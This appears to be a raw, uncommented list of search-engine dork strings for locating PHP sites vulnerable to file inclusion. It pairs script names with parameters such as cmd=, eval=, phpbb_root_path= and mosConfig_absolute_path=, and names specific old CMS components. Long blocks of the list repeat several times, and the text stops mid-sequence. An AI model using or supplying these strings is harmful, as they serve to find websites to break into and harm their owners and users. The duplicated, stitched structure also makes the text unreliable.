+enter.php?open= +base.php?rub= +gery.php?*[*]*= +include.php?cmd= +standard.php?dir= +layout.php?page= +index3.php?pageweb= +include.php?numero= +path.php?destino= +index3.php?home= +default.php?seite= +path.php?eval= +base.php?choix= +template.php?cont= +info.php?pagina= +default.php?x= +default.php?option= +gery.php?ki= +down*.php?second= +blank.php?path= +pagina.php?v= +file.php?pollname= +index3.php?var= +layout.php?goto= +pagina.php?incl= +home.php?action= +include.php?oldal= +print.php?left= +print.php?u= +nota.php?v= +home.php?str= +press.php?panel= +page.php?mod= +default.php?param= +down*.php?texto= +mod*.php?dir= +view.php?where= +blank.php?subject= +path.php?play= +base.php?l= +index2.php?rub= +general.php?opcion= +layout.php?xlink= +padrao.php?name= +pagina.php?nivel= +default.php?oldal= +template.php?k= +main.php?chapter= +layout.php?chapter= +layout.php?incl= +include.php?url= +base.php?sivu= +index.php?link= +sub*.php?cont= +info.php?oldal= +general.php?rub= +default.php?str= +head.php?ev= +sub*.php?path= +view.php?page= +main.php?j= +index2.php?basepath= +gery.php?qry= +main.php?url= +default.php?incl= +show.php?redirect= +index1.php?pre= +general.php?base_dir= +start.php?in= +show.php?abre= +index1.php?home= +home.php?ev= +index2.php?ki= +base.php?pag= +default.php?ir= +general.php?qry= +index2.php?home= +press.php?nivel= +enter.php?pr= +blank.php?loader= +start.php?cmd= +padrao.php?d= +sitio.php?recipe= +principal.php?read= +standard.php?showpage= +main.php?pg= +page.php?panel= +press.php?addr= +template.php?s= +main.php?tipo= +*inc*.php?ev= +padrao.php?page= +show.php?thispage= +home.php?secao= +main.php?start= +enter.php?mid= +press.php?id= +main.php?inc= +index3.php?cmd= +index.php?pname= +press.php?subject= +include.php?sec= +index3.php?xlink= +general.php?texto= +index3.php?go= +index.php?cmd= +index3.php?disp= +index3.php?left= +sub*.php?middle= +show.php?modo= +index1.php?pagina= +head.php?left= +enter.php?phpbb_root_path= +show.php?z= +start.php?basepath= +blank.php?strona= +template.php?y= +page.php?where= +layout.php?category= +index1.php?my= +principal.php?phpbb_root_path= +nota.php?channel= +page.php?choix= +start.php?xlink= +home.php?k= +standard.php?phpbb_root_path= +principal.php?middlePart= +mod*.php?m= +index.php?recipe= +template.php?path= +pagina.php?dir= +sitio.php?abre= +index1.php?recipe= +blank.php?page= +sub*.php?category= +*inc*.php?bOdy= +enter.php?middle= +home.php?path= +down*.php?pre= +base.php?w= +main.php?path= +nota.php?ir= +press.php?link= +gery.php?pollname= +down*.php?open= +down*.php?pageweb= +default.php?eval= +view.php?showpage= +show.php?get= +sitio.php?tipo= +layout.php?cont= +default.php?destino= +padrao.php?seccion= +down*.php?r= +main.php?param= +standard.php?e= +down*.php?in= +nota.php?include= +sitio.php?secao= +print.php?my= +general.php?abre= +general.php?link= +default.php?id= +standard.php?panel= +show.php?channel= +enter.php?r= +index3.php?phpbb_root_path= +gery.php?where= +head.php?middle= +sub*.php?load= +gery.php?sp= +show.php?chapter= +sub*.php?b= +general.php?adresa= +print.php?goto= +sub*.php?sp= +template.php?doshow= +padrao.php?base_dir= +index2.php?my= +include.php?w= +start.php?op= +main.php?section= +view.php?header= +layout.php?menue= +head.php?y= +sub*.php?content= +show.php?type= +base.php?id= +mod*.php?qry= +default.php?strona= +sitio.php?chapter= +gery.php?index= +nota.php?h= +page.php?oldal= +enter.php?panel= +blank.php?t= +start.php?pollname= +sub*.php?module= +enter.php?thispage= +mod*.php?index= +sitio.php?r= +sub*.php?play= +index2.php?doshow= +index2.php?chapter= +show.php?path= +gery.php?to= +info.php?base_dir= +gery.php?abre= +gery.php?pag= +view.php?channel= +default.php?mod= +index.php?op= +general.php?pre= +padrao.php?type= +template.php?pag= +standard.php?pre= +blank.php?ref= +down*.php?z= +general.php?inc= +home.php?read= +pagina.php?section= +default.php?basepath= +index.php?pre= +sitio.php?pageweb= +base.php?seite= +*inc*.php?j= +index2.php?filepath= +file.php?type= +index1.php?oldal= +index2.php?second= +index3.php?sekce= +info.php?filepath= +base.php?opcion= +path.php?category= +index3.php?start= +start.php?rub= +*inc*.php?i= +blank.php?pre= +general.php?channel= +index2.php?OpenPage= +page.php?section= +mod*.php?middle= +index1.php?goFile= +blank.php?action= +principal.php?loader= +sub*.php?op= +main.php?addr= +start.php?mid= +gery.php?secao= +pagina.php?tipo= +index.php?w= +head.php?where= +principal.php?tipo= +press.php?loader= +gery.php?showpage= +gery.php?go= +enter.php?start= +press.php?lang= +general.php?p= +index.php?sekce= +index2.php?get= +sitio.php?go= +include.php?cont= +sub*.php?where= +index3.php?index= +path.php?recipe= +info.php?loader= +print.php?sp= +page.php?phpbb_root_path= +path.php?bOdy= +principal.php?menue= +print.php?cont= +pagina.php?z= +default.php?mid= +blank.php?xlink= + +sub*.php?oldal= +general.php?b= +include.php?left= +print.php?sivu= +press.php?OpenPage= +default.php?cont= +general.php?pollname= +template.php?nivel= +enter.php?page= +file.php?middle= +standard.php?str= +gery.php?get= +main.php?v= +down*.php?subject= +enter.php?sivu= +path.php?option= +index.php?strona= +index1.php?choix= +index2.php?f= +press.php?destino= +pagina.php?channel= +principal.php?b= +home.php?include= +head.php?numero= +general.php?ref= +main.php?dir= +gery.php?cont= +principal.php?type= +file.php?param= +default.php?secao= +path.php?pageweb= +info.php?r= +base.php?phpbb_root_path= +main.php?itemnav= +view.php?pg= +pagina.php?choix= +default.php?itemnav= +index2.php?cmd= +layout.php?url= +index.php?path= +index1.php?second= +start.php?modo= +index1.php?get= +index3.php?my= +sub*.php?left= +print.php?inc= +view.php?type= +path.php?*[*]*= +base.php?adresa= +index3.php?oldal= +standard.php?bOdy= +base.php?path= +principal.php?strona= +info.php?l= +template.php?left= +head.php?loc= +page.php?ir= +print.php?path= +down*.php?path= +sitio.php?opcion= +pagina.php?category= +press.php?menu= +index2.php?pref= +sitio.php?incl= +show.php?ki= +index3.php?x= +page.php?strona= +*inc*.php?open= +index3.php?secao= +standard.php?*[*]*= +template.php?basepath= +standard.php?goFile= +index2.php?ir= +file.php?modo= +gery.php?itemnav= +main.php?oldal= +down*.php?showpage= +start.php?destino= +blank.php?rub= +path.php?ir= +layout.php?var= +index1.php?texto= +start.php?pg= +index1.php?showpage= +info.php?go= +path.php?load= +index3.php?abre= +blank.php?where= +info.php?start= +page.php?secao= +nota.php?pag= +nota.php?second= +index2.php?to= +standard.php?name= +start.php?strona= +mod*.php?numero= +press.php?home= +info.php?z= +mod*.php?path= +blank.php?base_dir= +base.php?texto= +nota.php?secc= +index.php?tipo= +index.php?goto= +print.php?pag= +view.php?secao= +general.php?strona= +show.php?my= +page.php?e= +padrao.php?index= +gery.php?thispage= +start.php?base_dir= +default.php?tipo= +gery.php?panel= +standard.php?ev= +standard.php?destino= +general.php?middle= +main.php?basepath= +standard.php?q= +index1.php?tipo= +mod*.php?choix= +template.php?ir= +show.php?adresa= +general.php?mid= +index3.php?adresa= +pagina.php?sec= +template.php?secao= +home.php?w= +general.php?content= +sub*.php?recipe= +main.php?category= +enter.php?viewpage= +main.php?ir= +show.php?pageweb= +principal.php?ir= +default.php?pageweb= +index.php?oldal= +head.php?d= +gery.php?mid= +index.php?type= +standard.php?j= +show.php?oldal= +enter.php?link= +enter.php?content= +blank.php?filepath= +standard.php?channel= +base.php?*[*]*= +info.php?incl= +down*.php?include= +press.php?modo= +file.php?choix= +press.php?type= +blank.php?goto= +index3.php?showpage= +principal.php?subject= +start.php?chapter= +show.php?r= +pagina.php?thispage= +general.php?chapter= +page.php?base_dir= +page.php?qry= +show.php?incl= +page.php?*[*]*= +main.php?h= +file.php?seccion= +default.php?pre= +principal.php?index= +principal.php?inc= +home.php?z= +pagina.php?in= +show.php?play= +nota.php?subject= +default.php?secc= +default.php?loader= +padrao.php?var= +mod*.php?b= +default.php?showpage= +press.php?channel= +pagina.php?ev= +sitio.php?name= +page.php?option= +press.php?mid= +down*.php?corpo= +view.php?get= +print.php?thispage= +principal.php?home= +show.php?param= +standard.php?sivu= +index3.php?panel= +include.php?play= +path.php?cmd= +file.php?sp= +template.php?section= +view.php?str= +blank.php?left= +nota.php?lang= +path.php?sivu= +main.php?e= +default.php?ref= +start.php?seite= +default.php?inc= +print.php?disp= +home.php?h= +principal.php?loc= +index3.php?sp= +gery.php?var= +sub*.php?base_dir= +path.php?middle= +pagina.php?str= +base.php?play= +base.php?v= +sitio.php?sivu= +main.php?r= +file.php?nivel= +start.php?sivu= +template.php?c= +general.php?second= +sub*.php?mod= +home.php?loc= +head.php?corpo= +standard.php?op= +index2.php?inc= +info.php?pref= +base.php?basepath= +print.php?basepath= +*inc*.php?m= +base.php?home= +layout.php?strona= +padrao.php?url= +sitio.php?oldal= +pagina.php?read= +index1.php?go= +standard.php?s= +page.php?eval= +index.php?j= +pagina.php?pr= +start.php?secao= +template.php?*[*]*= +nota.php?get= +index3.php?link= +home.php?e= +gery.php?name= +nota.php?eval= +sub*.php?abre= +index2.php?load= +principal.php?in= +view.php?load= +mod*.php?action= +default.php?p= +head.php?c= +template.php?viewpage= +view.php?mid= +padrao.php?addr= +view.php?go= +file.php?basepath= +home.php?pre= +include.php?goFile= +layout.php?play= +index1.php?subject= +info.php?middlePart= +down*.php?pg= +sub*.php?bOdy= +index.php?option= +sub*.php?chapter= +default.php?t= +head.php?opcion= +nota.php?panel= +sitio.php?left= +show.php?include= +pagina.php?start= +head.php?choix= +index3.php?tipo= +index3.php?choix= +down*.php?channel= +base.php?pa= +nota.php?sekce= +show.php?l= +show.php?index= +blank.php?url= +start.php?thispage= +nota.php?play= +show.php?second= +enter.php?include= +principal.php?middle= +main.php?where= +padrao.php?link= +path.php?strona= +index3.php?read= +mod*.php?module= +standard.php?viewpage= +standard.php?pr= +*inc*.php?showpage= +pagina.php?ref= +path.php?pname= +padrao.php?mid= +info.php?eval= +include.php?path= +page.php?subject= +sub*.php?qry= +head.php?module= +nota.php?opcion= +head.php?abre= +base.php?str= +home.php?bOdy= +gery.php?module= +head.php?sivu= +page.php?inc= +pagina.php?header= +mod*.php?v= +home.php?doshow= +padrao.php?n= +index1.php?chapter= +padrao.php?basepath= +index.php?r= +index3.php?seccion= +sitio.php?mid= +index.php?where= +general.php?type= + +pagina.php?goto= +page.php?pa= +default.php?menue= +main.php?goto= +index1.php?abre= +info.php?seccion= +index2.php?pa= +layout.php?pageweb= +nota.php?disp= +index1.php?bOdy= +default.php?nivel= +show.php?header= +down*.php?pag= +start.php?tipo= +standard.php?w= +index.php?open= +blank.php?menu= +general.php?nivel= +padrao.php?nivel= +*inc*.php?addr= +index.php?var= +home.php?redirect= +*inc*.php?link= +*inc*.php?incl= +padrao.php?corpo= +down*.php?url= +enter.php?goto= +down*.php?addr= +sub*.php?j= +principal.php?f= +sub*.php?menue= +index2.php?section= +general.php?my= +head.php?loader= +general.php?goto= +include.php?dir= +start.php?header= +blank.php?in= +base.php?name= +nota.php?goFile= +head.php?base_dir= +mod*.php?recipe= +press.php?pr= +padrao.php?*[*]*= +layout.php?opcion= +print.php?rub= +index.php?pr= +general.php?seite= +pagina.php?numero= +*inc*.php?pg= +nota.php?rub= +view.php?seite= +pagina.php?recipe= +index.php?pref= +page.php?action= +page.php?ev= +show.php?ir= +head.php?index= +mod*.php?pname= +view.php?ir= +*inc*.php?start= +principal.php?rub= +principal.php?corpo= +padrao.php?middle= +base.php?pname= +template.php?header= +view.php?sp= +main.php?name= +nota.php?m= +blank.php?open= +head.php?dir= +page.php?pname= +*inc*.php?k= +index.php?pollname= +head.php?oldal= +index1.php?str= +template.php?choix= +down*.php?pollname= +page.php?recipe= +template.php?corpo= +nota.php?sec= +info.php?*[*]*= +sub*.php?*[*]*= +page.php?q= +index1.php?type= +gery.php?y= +standard.php?lang= +gery.php?page= +index.php?action= +press.php?pname= +down*.php?v= +index3.php?second= +show.php?recipe= +main.php?pre= +file.php?numero= +print.php?str= +standard.php?link= +nota.php?OpenPage= +view.php?pollname= +print.php?l= +index.php?go= +standard.php?numero= +view.php?pr= +down*.php?read= +down*.php?action= +index1.php?OpenPage= +principal.php?left= +mod*.php?start= +file.php?bOdy= +gery.php?pg= +blank.php?qry= +base.php?eval= +default.php?left= +gery.php?param= +blank.php?pa= +nota.php?b= +path.php?loader= +start.php?o= +include.php?include= +nota.php?corpo= +enter.php?second= +sub*.php?pname= +mod*.php?pageweb= +principal.php?addr= +standard.php?action= +template.php?lang= +include.php?basepath= +sub*.php?ir= +down*.php?nivel= +path.php?opcion= +print.php?category= +print.php?menu= +layout.php?secao= +template.php?param= +standard.php?ref= +base.php?include= +blank.php?bOdy= +path.php?pref= +print.php?g= +padrao.php?subject= +nota.php?modo= +index3.php?loader= +template.php?seite= +general.php?pageweb= +index2.php?param= +path.php?nivel= +page.php?pref= +press.php?pref= +enter.php?ev= +standard.php?middle= +index2.php?recipe= +blank.php?dir= +home.php?pageweb= +view.php?panel= +down*.php?home= +head.php?ir= +mod*.php?ir= +show.php?pagina= +default.php?base_dir= +show.php?loader= +path.php?mid= +blank.php?abre= +down*.php?choix= +info.php?opcion= +page.php?loader= +principal.php?oldal= +index1.php?load= +home.php?content= +pagina.php?sekce= +file.php?n= +include.php?redirect= +print.php?itemnav= +enter.php?index= +print.php?middle= +sitio.php?goFile= +head.php?include= +enter.php?e= +index.php?play= +enter.php?id= +view.php?mod= +show.php?nivel= +file.php?channel= +layout.php?choix= +info.php?bOdy= +include.php?go= +index3.php?nivel= +sub*.php?include= +path.php?numero= +principal.php?header= +main.php?opcion= +enter.php?s= +sub*.php?pre= +include.php?index= +gery.php?pageweb= +padrao.php?path= +info.php?url= +press.php?ev= +index1.php?pg= +print.php?in= +general.php?modo= +head.php?ki= +press.php?my= +index1.php?pollname= +principal.php?to= +default.php?play= +page.php?g= +nota.php?pg= +blank.php?destino= +blank.php?z= +components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= +module_db.php?pivot_path= module_db.php?pivot_path=” +/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=” +components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath= +com_extended_registration +smarty_config.php?root_dir= “smarty” +include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr +send_reminders.php?includedir= “send_reminders.php?includedir=” +components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery +inc/functions.inc.php?config[ppa_root_path]= “Index – Albums” index.php +/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg” +[Script Path]/admin/index.php?o= admin/index.php”; +/admin/index.php?o= admin/index.php”; +/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine +/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar +admin/doeditconfig.php?thispath=../includes&config[path]= “admin” +/components/com_simpleboard/image_upload.php?sbp= com_simpleboard” +components/com_simpleboard/image_upload.php?sbp= com_simpleboard” +/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine +mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]= +zentrack/index.php?configFile= +inst/index.php?lng=../../include/main.inc&G_PATH= +pivot/modules/module_db.php?pivot_path= +include/write.php?dir= +includes/header.php?systempath= +becommunity/community/index.php?pageurl= +agendax/addevent.inc.php?agendax_path= +myPHPCalendar/admin.php?cal_dir= +yabbse/Sources/Packages.php?sourcedir= +zboard/zboard.php + +path_of_cpcommerce/_functions.php?prefixpage.php?pa= +default.php?menue= +main.php?goto= +index1.php?abre= +info.php?seccion= +index2.php?pa= +layout.php?pageweb= +nota.php?disp= +index1.php?bOdy= +default.php?nivel= +show.php?header= +down*.php?pag= +start.php?tipo= +standard.php?w= +index.php?open= +blank.php?menu= +general.php?nivel= +padrao.php?nivel= +*inc*.php?addr= +index.php?var= +home.php?redirect= +*inc*.php?link= +*inc*.php?incl= +padrao.php?corpo= +down*.php?url= +enter.php?goto= +down*.php?addr= +sub*.php?j= +principal.php?f= +sub*.php?menue= +index2.php?section= +general.php?my= +head.php?loader= +general.php?goto= +include.php?dir= +start.php?header= +blank.php?in= +base.php?name= +nota.php?goFile= +head.php?base_dir= +mod*.php?recipe= +press.php?pr= +padrao.php?*[*]*= +layout.php?opcion= +print.php?rub= +index.php?pr= +general.php?seite= +pagina.php?numero= +*inc*.php?pg= +nota.php?rub= +view.php?seite= +pagina.php?recipe= +index.php?pref= +page.php?action= +page.php?ev= +show.php?ir= +head.php?index= +mod*.php?pname= +view.php?ir= +*inc*.php?start= +principal.php?rub= +principal.php?corpo= +padrao.php?middle= +base.php?pname= +template.php?header= +view.php?sp= +main.php?name= +nota.php?m= +blank.php?open= +head.php?dir= +page.php?pname= +*inc*.php?k= +index.php?pollname= +head.php?oldal= +index1.php?str= +template.php?choix= +down*.php?pollname= +page.php?recipe= +template.php?corpo= +nota.php?sec= +info.php?*[*]*= +sub*.php?*[*]*= +page.php?q= +index1.php?type= +gery.php?y= +standard.php?lang= +gery.php?page= +index.php?action= +press.php?pname= +down*.php?v= +index3.php?second= +show.php?recipe= +main.php?pre= +file.php?numero= +print.php?str= +standard.php?link= +nota.php?OpenPage= +view.php?pollname= +print.php?l= +index.php?go= +standard.php?numero= +view.php?pr= +down*.php?read= +down*.php?action= +index1.php?OpenPage= +principal.php?left= +mod*.php?start= +file.php?bOdy= +gery.php?pg= +blank.php?qry= +base.php?eval= +default.php?left= +gery.php?param= +blank.php?pa= +nota.php?b= +path.php?loader= +start.php?o= +include.php?include= +nota.php?corpo= +enter.php?second= +sub*.php?pname= +mod*.php?pageweb= +principal.php?addr= +standard.php?action= +template.php?lang= +include.php?basepath= +sub*.php?ir= +down*.php?nivel= +path.php?opcion= +print.php?category= +print.php?menu= +layout.php?secao= +template.php?param= +standard.php?ref= +base.php?include= +blank.php?bOdy= +path.php?pref= +print.php?g= +padrao.php?subject= +nota.php?modo= +index3.php?loader= +template.php?seite= +general.php?pageweb= +index2.php?param= +path.php?nivel= +page.php?pref= +press.php?pref= +enter.php?ev= +standard.php?middle= +index2.php?recipe= +blank.php?dir= +home.php?pageweb= +view.php?panel= +down*.php?home= +head.php?ir= +mod*.php?ir= +show.php?pagina= +default.php?base_dir= +show.php?loader= +path.php?mid= +blank.php?abre= +down*.php?choix= +info.php?opcion= +page.php?loader= +principal.php?oldal= +index1.php?load= +home.php?content= +pagina.php?sekce= +file.php?n= +include.php?redirect= +print.php?itemnav= +enter.php?index= +print.php?middle= +sitio.php?goFile= +head.php?include= +enter.php?e= +index.php?play= +enter.php?id= +view.php?mod= +show.php?nivel= +file.php?channel= +layout.php?choix= +info.php?bOdy= +include.php?go= +index3.php?nivel= +sub*.php?include= +path.php?numero= +principal.php?header= +main.php?opcion= +enter.php?s= +sub*.php?pre= +include.php?index= +gery.php?pageweb= +padrao.php?path= +info.php?url= +press.php?ev= +index1.php?pg= +print.php?in= +general.php?modo= +head.php?ki= +press.php?my= +index1.php?pollname= +principal.php?to= +default.php?play= +page.php?g= +nota.php?pg= +blank.php?destino= +blank.php?z= +components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= +module_db.php?pivot_path= module_db.php?pivot_path=” +/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=” +components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath= +com_extended_registration +smarty_config.php?root_dir= “smarty” +include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr +send_reminders.php?includedir= “send_reminders.php?includedir=” +components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery +inc/functions.inc.php?config[ppa_root_path]= “Index – Albums” index.php +/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg” +[Script Path]/admin/index.php?o= admin/index.php”; +/admin/index.php?o= admin/index.php”; +/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine +/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar +admin/doeditconfig.php?thispath=../includes&config[path]= “admin” +/components/com_simpleboard/image_upload.php?sbp= com_simpleboard” +components/com_simpleboard/image_upload.php?sbp= com_simpleboard” +/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine +mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]= +zentrack/index.php?configFile= +inst/index.php?lng=../../include/main.inc&G_PATH= +pivot/modules/module_db.php?pivot_path= +include/write.php?dir= +includes/header.php?systempath= +becommunity/community/index.php?pageurl= +agendax/addevent.inc.php?agendax_path= +myPHPCalendar/admin.php?cal_dir= +yabbse/Sources/Packages.php?sourcedir= +zboard/zboard.php +path_of_cpcommerce/_functions.php?prefixpage.php?pa= +default.php?menue= +main.php?goto= +index1.php?abre= +info.php?seccion= +index2.php?pa= +layout.php?pageweb= +nota.php?disp= +index1.php?bOdy= +default.php?nivel= +show.php?header= +down*.php?pag= +start.php?tipo= +standard.php?w= +index.php?open= +blank.php?menu= +general.php?nivel= +padrao.php?nivel= +*inc*.php?addr= +index.php?var= +home.php?redirect= +*inc*.php?link= +*inc*.php?incl= +padrao.php?corpo= +down*.php?url= +enter.php?goto= +down*.php?addr= +sub*.php?j= +principal.php?f= +sub*.php?menue= +index2.php?section= +general.php?my= +head.php?loader= +general.php?goto= +include.php?dir= +start.php?header= +blank.php?in= +base.php?name= +nota.php?goFile= +head.php?base_dir= +mod*.php?recipe= +press.php?pr= +padrao.php?*[*]*= +layout.php?opcion= +print.php?rub= +index.php?pr= +general.php?seite= +pagina.php?numero= +*inc*.php?pg= +nota.php?rub= +view.php?seite= +pagina.php?recipe= +index.php?pref= +page.php?action= +page.php?ev= +show.php?ir= +head.php?index= +mod*.php?pname= +view.php?ir= +*inc*.php?start= +principal.php?rub= +principal.php?corpo= +padrao.php?middle= +base.php?pname= +template.php?header= +view.php?sp= +main.php?name= +nota.php?m= +blank.php?open= +head.php?dir= +page.php?pname= +*inc*.php?k= +index.php?pollname= +head.php?oldal= +index1.php?str= +template.php?choix= +down*.php?pollname= +page.php?recipe= +template.php?corpo= +nota.php?sec= +info.php?*[*]*= +sub*.php?*[*]*= +page.php?q= +index1.php?type= +gery.php?y= +standard.php?lang= +gery.php?page= +index.php?action= +press.php?pname= +down*.php?v= +index3.php?second= +show.php?recipe= +main.php?pre= +file.php?numero= +print.php?str= +standard.php?link= +nota.php?OpenPage= +view.php?pollname= +print.php?l= +index.php?go= +standard.php?numero= +view.php?pr= +down*.php?read= +down*.php?action= +index1.php?OpenPage= +principal.php?left= +mod*.php?start= +file.php?bOdy= +gery.php?pg= +blank.php?qry= +base.php?eval= +default.php?left= +gery.php?param= +blank.php?pa= +nota.php?b= +path.php?loader= +start.php?o= +include.php?include= +nota.php?corpo= +enter.php?second= +sub*.php?pname= +mod*.php?pageweb= +principal.php?addr= +standard.php?action= +template.php?lang= +include.php?basepath= +sub*.php?ir= +down*.php?nivel= +path.php?opcion= +print.php?category= +print.php?menu= +layout.php?secao= +template.php?param= +standard.php?ref= +base.php?include= +blank.php?bOdy= +path.php?pref= +print.php?g= +padrao.php?subject= +nota.php?modo= +index3.php?loader= +template.php?seite= +general.php?pageweb= +index2.php?param= +path.php?nivel= +page.php?pref= +press.php?pref= +enter.php?ev= +standard.php?middle= +index2.php?recipe= +blank.php?dir= +home.php?pageweb= +view.php?panel= +down*.php?home= +head.php?ir= +mod*.php?ir= +show.php?pagina= +default.php?base_dir= +show.php?loader= +path.php?mid= +blank.php?abre= +down*.php?choix= +info.php?opcion= +page.php?loader= +principal.php?oldal= +index1.php?load= +home.php?content= +pagina.php?sekce= +file.php?n= +include.php?redirect= +print.php?itemnav= +enter.php?index= +print.php?middle= +sitio.php?goFile= +head.php?include= +enter.php?e= +index.php?play= +enter.php?id= +view.php?mod= +show.php?nivel= +file.php?channel= +layout.php?choix= +info.php?bOdy= +include.php?go= +index3.php?nivel= +sub*.php?include= +path.php?numero= +principal.php?header= +main.php?opcion= +enter.php?s= +sub*.php?pre= +include.php?index= +gery.php?pageweb= +padrao.php?path= +info.php?url= +press.php?ev= +index1.php?pg= +print.php?in= +general.php?modo= +head.php?ki= +press.php?my= +index1.php?pollname= +principal.php?to= +default.php?play= +page.php?g= +nota.php?pg= +blank.php?destino= +blank.php?z= +components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= +module_db.php?pivot_path= module_db.php?pivot_path=” +/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=” +components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath= +com_extended_registration +smarty_config.php?root_dir= “smarty” +include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr +send_reminders.php?includedir= “send_reminders.php?includedir=” +components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery +inc/functions.inc.php?config[ppa_root_path]= “Index – Albums” index.php +/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg” +[Script Path]/admin/index.php?o= admin/index.php”; +/admin/index.php?o= admin/index.php”; +/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine +/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar +admin/doeditconfig.php?thispath=../includes&config[path]= “admin” +/components/com_simpleboard/image_upload.php?sbp= com_simpleboard” +components/com_simpleboard/image_upload.php?sbp= com_simpleboard” +/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine +mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]= +zentrack/index.php?configFile= +inst/index.php?lng=../../include/main.inc&G_PATH= +pivot/modules/module_db.php?pivot_path= +include/write.php?dir= +includes/header.php?systempath= +becommunity/community/index.php?pageurl= +agendax/addevent.inc.php?agendax_path= +myPHPCalendar/admin.php?cal_dir= +yabbse/Sources/Packages.php?sourcedir= +zboard/zboard.php +path_of_cpcommerce/_functions.php?prefixpage.php?pa= +default.php?menue= +main.php?goto= +index1.php?abre= +info.php?seccion= +index2.php?pa= +layout.php?pageweb= +nota.php?disp= +index1.php?bOdy= +default.php?nivel= +show.php?header= +down*.php?pag= +start.php?tipo= +standard.php?w= +index.php?open= +blank.php?menu= +general.php?nivel= +padrao.php?nivel= +*inc*.php?addr= +index.php?var= +home.php?redirect= +*inc*.php?link= +*inc*.php?incl= +padrao.php?corpo= +down*.php?url= +enter.php?goto= +down*.php?addr= +sub*.php?j= +principal.php?f= +sub*.php?menue= +index2.php?section= +general.php?my= +head.php?loader= +general.php?goto= +include.php?dir= +start.php?header= +blank.php?in= +base.php?name= +nota.php?goFile= +head.php?base_dir= +mod*.php?recipe= +press.php?pr= +padrao.php?*[*]*= +layout.php?opcion= +print.php?rub= +index.php?pr= +general.php?seite= +pagina.php?numero= +*inc*.php?pg= +nota.php?rub= +view.php?seite= +pagina.php?recipe= +index.php?pref= +page.php?action= +page.php?ev= +show.php?ir= +head.php?index= +mod*.php?pname= +view.php?ir= +*inc*.php?start= +principal.php?rub= +principal.php?corpo= +padrao.php?middle= +base.php?pname= +template.php?header= +view.php?sp= +main.php?name= +nota.php?m= +blank.php?open= +head.php?dir= +page.php?pname= +*inc*.php?k= +index.php?pollname= +head.php?oldal= +index1.php?str= +template.php?choix= +down*.php?pollname= +page.php?recipe= +template.php?corpo= +nota.php?sec= +info.php?*[*]*= +sub*.php?*[*]*= +page.php?q= +index1.php?type= +gery.php?y= +standard.php?lang= +gery.php?page= +index.php?action= +press.php?pname= +down*.php?v= +index3.php?second= +show.php?recipe= +main.php?pre= +file.php?numero= +print.php?str= +standard.php?link= +nota.php?OpenPage= +view.php?pollname= +print.php?l= +index.php?go= +standard.php?numero= +view.php?pr= +down*.php?read= +down*.php?action= +index1.php?OpenPage= +principal.php?left= +mod*.php?start= +file.php?bOdy= +gery.php?pg= +blank.php?qry= +base.php?eval= +default.php?left= +gery.php?param= +blank.php?pa= +nota.php?b= +path.php?loader= +start.php?o= +include.php?include= +nota.php?corpo= +enter.php?second= +sub*.php?pname= +mod*.php?pageweb= +principal.php?addr= +standard.php?action= +template.php?lang= +include.php?basepath= +sub*.php?ir= +down*.php?nivel= +path.php?opcion= +print.php?category= +print.php?menu= +layout.php?secao= +template.php?param= +standard.php?ref= +base.php?include= +blank.php?bOdy= +path.php?pref= +print.php?g= +padrao.php?subject= +nota.php?modo= +index3.php?loader= +template.php?seite= +general.php?pageweb= +index2.php?param= +path.php?nivel= +page.php?pref= +press.php?pref= +enter.php?ev= +standard.php?middle= +index2.php?recipe= +blank.php?dir= +home.php?pageweb= +view.php?panel= +down*.php?home= +head.php?ir= +mod*.php?ir= +show.php?pagina= +default.php?base_dir= +show.php?loader= +path.php?mid= +blank.php?abre= +down*.php?choix= +info.php?opcion= +page.php?loader= +principal.php?oldal= +index1.php?load= +home.php?content= +pagina.php?sekce= +file.php?n= +include.php?redirect= +print.php?itemnav= +enter.php?index= +print.php?middle= +sitio.php?goFile= +head.php?include= +enter.php?e= +index.php?play= +enter.php?id= +view.php?mod= +show.php?nivel= +file.php?channel= +layout.php?choix= +info.php?bOdy= +include.php?go= +index3.php?nivel= +sub*.php?include= +path.php?numero= +principal.php?header= +main.php?opcion= +enter.php?s= +sub*.php?pre= +include.php?index= +gery.php?pageweb= +padrao.php?path= +info.php?url= +press.php?ev= +index1.php?pg= +print.php?in= +general.php?modo= +head.php?ki= +press.php?my= +index1.php?pollname= +principal.php?to= +default.php?play= +page.php?g= +nota.php?pg= +blank.php?destino= +blank.php?z= +components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= +module_db.php?pivot_path= module_db.php?pivot_path=” +/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=” +components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath= +com_extended_registration +smarty_config.php?root_dir= “smarty” 